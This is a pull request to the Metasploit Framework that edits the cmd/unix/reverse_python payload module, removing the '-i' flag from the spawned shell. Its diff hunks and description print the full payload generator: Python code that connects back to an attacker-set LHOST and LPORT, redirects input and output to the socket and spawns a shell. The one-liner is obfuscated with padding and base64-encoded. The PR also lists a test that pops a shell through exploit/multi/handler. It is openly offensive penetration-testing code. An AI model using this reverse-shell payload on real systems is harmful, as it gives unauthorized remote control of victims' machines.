### PR TITLE
Remove -i from shell in reverse_python

### DIFF
--- a/modules/payloads/singles/cmd/unix/reverse_python.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_python.rb
@@ -50,7 +50,7 @@ module Metasploit3
   #
 
   def command_string
-    raw_cmd = "import socket,subprocess,os;host=\"#{datastore['LHOST']}\";port=#{datastore['LPORT']};s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"#{datastore['SHELL']}\",\"-i\"]);"
+    raw_cmd = "import socket,subprocess,os;host=\"#{datastore['LHOST']}\";port=#{datastore['LPORT']};s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(\"#{datastore['SHELL']}\");"
     obfuscated_cmd = raw_cmd.gsub(/,/, "#{random_padding},#{random_padding}").gsub(/;/, "#{random_padding};#{random_padding}")
     encoded_cmd = Rex::Text.encode_base64(obfuscated_cmd)
     "python -c \"exec('#{encoded_cmd}'.decode('base64'))\""

--- a/modules/payloads/singles/cmd/unix/reverse_python.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_python.rb
@@ -50,7 +50,7 @@ module Metasploit3
   #
 
   def command_string
-    raw_cmd = "import socket,subprocess,os;host=\"#{datastore['LHOST']}\";port=#{datastore['LPORT']};s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(\"#{datastore['SHELL']}\");"
+    raw_cmd = "import socket,subprocess,os;host=\"#{datastore['LHOST']}\";port=#{datastore['LPORT']};s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(\"#{datastore['SHELL']}\")"
     obfuscated_cmd = raw_cmd.gsub(/,/, "#{random_padding},#{random_padding}").gsub(/;/, "#{random_padding};#{random_padding}")
     encoded_cmd = Rex::Text.encode_base64(obfuscated_cmd)
     "python -c \"exec('#{encoded_cmd}'.decode('base64'))\""


### PR DESCRIPTION
```
wvu@kharak:~/metasploit-framework:master$ git grep -w -- -i modules/payloads | cat
modules/payloads/singles/cmd/unix/reverse_python.rb:    raw_cmd = "import socket,subprocess,os;host=\"#{datastore['LHOST']}\";port=#{datastore['LPORT']};s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"#{datastore['SHELL']}\",\"-i\"]);"
wvu@kharak:~/metasploit-framework:master$ 
```

Consistency with the rest of our payloads. Also, if a shell doesn't support the intended `-i`, we're fscked. Rediscovered in #4857.
- [x] Spin up `exploit/multi/handler`
- [x] Pop a `reverse_python` shell
- [x] See that everything works
